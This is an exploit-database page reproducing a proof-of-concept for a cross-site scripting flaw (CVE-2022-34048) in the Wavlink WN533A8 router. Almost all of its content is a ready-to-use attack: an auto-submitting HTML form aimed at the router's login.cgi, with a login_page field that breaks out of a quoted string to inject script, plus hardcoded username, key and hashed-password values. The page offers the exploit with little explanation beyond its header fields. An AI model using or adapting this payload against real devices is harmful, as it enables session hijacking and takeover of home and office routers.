Edit Report

Our sensors found this exploit at:

Below is a copy:

Wavlink WN533A8 Cross Site Scripting
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page :
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows

# Poc code
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
      <input type="hidden" name="newUI" value="1" />
      <input type="hidden" name="page" value="login" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="langChange" value="0" />
     <input type="hidden" name="ipaddr" value="" />
      <input type="hidden" name="login_page" value="x");alert(9);x=("" />
      <input type="hidden" name="homepage" value="main.shtml" />
      <input type="hidden" name="sysinitpage" value="sysinit.shtml" />
      <input type="hidden" name="wizardpage" value="wiz.shtml" />
      <input type="hidden" name="hostname" value="" />
      <input type="hidden" name="key" value="M94947765" />
      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
      <input type="hidden" name="lang_select" value="en" />
      <input type="submit" value="Submit request" />

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.